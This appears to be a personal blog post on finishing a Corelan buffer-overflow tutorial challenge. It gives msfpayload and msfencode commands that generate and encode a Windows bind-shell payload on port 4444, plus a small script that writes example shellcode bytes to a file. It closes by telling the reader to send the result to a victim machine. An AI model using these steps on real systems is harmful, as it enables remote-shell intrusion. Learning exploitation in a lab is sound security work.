Have in mind that this is not intentioned to make you learn, or anything like that, this blog is for personal use, and will contain info that I don't wanna lose or forget. Anyway, I share with everyone, so that it can be helpful for other people.
I learn about buffer overflow from the below link, one of the many tutorials of corelan team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
That is an extremely good tutorial, one that you actually can follow, and understand, and specially one that you can test yourself.
At the end of the tutorial, you have a type of challenge, where you should be able to make your shellcode to be able to get a telnet connection on the remote computer, getting that shellcode to insert on the exploit is the challenge part.
The way I found to do it was:
Get the payload from the msfpayload:
msfpayload windows/shell_bind_tcp
That will create the shell code of a telnet connection with an open port at 4444(default)
Now, if you test it, it will not work, because it have probably null's and bad chars not supported on the RMtoMP3 application, so we have to use and encoder.
Here come's the trick:
Step 1
Imagine this is the shell code(this is just and example):
\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18
\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b
\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac
\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4
\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b
what you have to do, is create a scrip, that write the shell code in a binary file.
For this example, I will use perl as script language:
#!/usr/bin/python
shell = ("\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
file = open('shellcode.bin','w')
file.write(shell)
file.close()
Step 2
After running the script you will have a shellcode.bin file. So now, is time to use our encoder:
msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c
Where:
-e ... -> is the type of encoder you wanna use. you can get a list of then using msfencode -l
-b ... -> is the characters you want to avoid, in this case the null
-i ... -> is the file you want to encode
and
-t ... -> is the output file format
With this all set, you just now have the correct shell code, and now just need to add it to your own exploit.
Send it to the victim machine and Voilá!!!
No comments:
Post a Comment